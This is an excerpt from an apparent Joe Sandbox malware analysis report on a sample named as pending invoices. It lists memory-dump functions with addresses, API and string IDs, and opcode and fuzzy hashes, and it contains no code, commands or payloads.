                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Wow64 Emulation Layer
                                • API String ID: 3446177414-921169906
                                • Opcode ID: 7ca23fe5ecb64c296f27faa2f23ad7ef7dbcab2cab89e8b699cb3cd3b656308f
                                • Instruction ID: 1fbea05b62653572d0f29c280c8062996613334bec666aca79df4142540a47d0
                                • Opcode Fuzzy Hash: 7ca23fe5ecb64c296f27faa2f23ad7ef7dbcab2cab89e8b699cb3cd3b656308f
                                • Instruction Fuzzy Hash: DA21F7B590015DBFEF019AA4CD84CBFBB7DEF84699B044468FA06A2140EA319F059B70
                                Function 325B7CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 22054147cd1a5e31a4c9769a74786ae18dec810a85747037d95c43cf0d000d2a
                                • Instruction ID: 2c556525d8019fb8109f952c36eca0a2ebe36529dd2556235a3869895b4ea629
                                • Opcode Fuzzy Hash: 22054147cd1a5e31a4c9769a74786ae18dec810a85747037d95c43cf0d000d2a
                                • Instruction Fuzzy Hash: A9E16276E00309AFDF15CFA4D885BEEBBB4BF44394F10852AE915EB280D770AA45CB50
                                Function 3250EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be668b9848aafbbaf978e33694163423655bcaccda23d800e1b88320abf755d0
                                • Instruction ID: bda8efa61ed67bf0d370e8c5146c1534c07ea96e24e087b9b3abd973f6cca136
                                • Opcode Fuzzy Hash: be668b9848aafbbaf978e33694163423655bcaccda23d800e1b88320abf755d0
                                • Instruction Fuzzy Hash: DEE1E075D00708DFDB25CFA9C980A9DBBF1BF48354F20892AE956E7260DB71AA41CF50
                                Function 3255EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: e52b45d46ae8fc61612be7cc99d5df749b28e89a9f23f0969c5866e55332975d
                                • Instruction ID: 78388a8728406eaf50e268e38cfae434fa8f2d8d9b02f4b051cda1256918092d
                                • Opcode Fuzzy Hash: e52b45d46ae8fc61612be7cc99d5df749b28e89a9f23f0969c5866e55332975d
                                • Instruction Fuzzy Hash: EC714371E012199FDF05CFA4C980ADDBBB5BF49354F64402AE906FB250DB34AA06CFA4
                                Function 325BA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 117c84eec06c2c93174e8732e15f3f19d2de7bede57ab9b480139eea3a3474d9
                                • Instruction ID: 3c29d11812b7f99cb1e116154940cdfe78b831ee77cb5d598cb8055044ebc8e4
                                • Opcode Fuzzy Hash: 117c84eec06c2c93174e8732e15f3f19d2de7bede57ab9b480139eea3a3474d9
                                • Instruction Fuzzy Hash: 26515A79B01A129FEF08CE58C8A5A29BBF1FF89354B10456DD906DB790DB74EE41CB80
                                Function 3255F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: cb09d2a00913b92c2e277843e54797277ca0ea6b80f04f2a48d8ee9acb69bb0c
                                • Instruction ID: d4d4260a6b9b7c2ce4f9a088ef3157db6a988f5b0e04b686a88d68be5477a51e
                                • Opcode Fuzzy Hash: cb09d2a00913b92c2e277843e54797277ca0ea6b80f04f2a48d8ee9acb69bb0c
                                • Instruction Fuzzy Hash: FA5135B5E112199FEF04CF95D940ADDBBB1BF49354F25802AE806FB250D7389A41CF50
                                Function 32517B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                • String ID:
                                • API String ID: 4281723722-0
                                • Opcode ID: 3d4115ea1a032aa2ff616ac199698438451f904a4950a77654f64640e49773db
                                • Instruction ID: b1135e50f8a5a3173343d11dbf4d3b139227874f46d96f49230da740b3de2026
                                • Opcode Fuzzy Hash: 3d4115ea1a032aa2ff616ac199698438451f904a4950a77654f64640e49773db
                                • Instruction Fuzzy Hash: 53314475E42219AFCF05DFA9D884A9DBBB1BB48321F20452AF511F7290DB305E41CF54
                                Function 324E59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: c018774b2f238f78e35277b83e1ae7aa9647fd8114bb25bce336b3f5e2c9d34c
                                • Instruction ID: 7123d9a668f89763755bce67c9b95e336e20b236cfadc8bfee30452dfd5ef78d
                                • Opcode Fuzzy Hash: c018774b2f238f78e35277b83e1ae7aa9647fd8114bb25bce336b3f5e2c9d34c
                                • Instruction Fuzzy Hash: 10322674D04369DFEB25CF64C984BDDBBB0BB08305F0041E9D94AA7281DBB59A85CF91
                                Function 32527D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 5ad556acd5242ff9ad7a9bfa2a0ea90aaad72d1400135b14d55cfac39f77aa0a
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: 2191C3B5E043169FEB14CF69D8817AEBBB5EF44365F50461AE864AB2C0EB309B40C761
                                Function 32514C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$Flst
                                • API String ID: 0-758220159
                                • Opcode ID: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                • Instruction ID: 83f0059087031033667b74e5afa875073bd51315b149a72f9380eaa7607b27fb
                                • Opcode Fuzzy Hash: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                • Instruction Fuzzy Hash: C3519BB5E002489FEF15CF98D484759FBF4EF44799F65902ED4099B250EB70AA85CB80
                                Function 324E04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • kLsE, xrefs: 324E0540
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324E063D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 3446177414-2547482624
                                • Opcode ID: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
                                • Instruction ID: 7fcb4b865470dc55e0ab77ba0a88268e669895397379468ccb02beb12029cfa3
                                • Opcode Fuzzy Hash: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
                                • Instruction Fuzzy Hash: BE5179B59047429BE324DF74C5807A7B7E4AF84705F00983EE9EA97240EB74D646CFA2
                                Function 324DDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: 0$0
                                • API String ID: 3446177414-203156872
                                • Opcode ID: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                • Instruction ID: 0f21ce7f49df30f5de89f4cd1c9c10482e0d240116abd613d02019f2cb3dbfaf
                                • Opcode Fuzzy Hash: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                • Instruction Fuzzy Hash: 51415CB6A08705DFD301CF28C494A1ABBE4BB88354F04492EF989DB341D771EA46CF96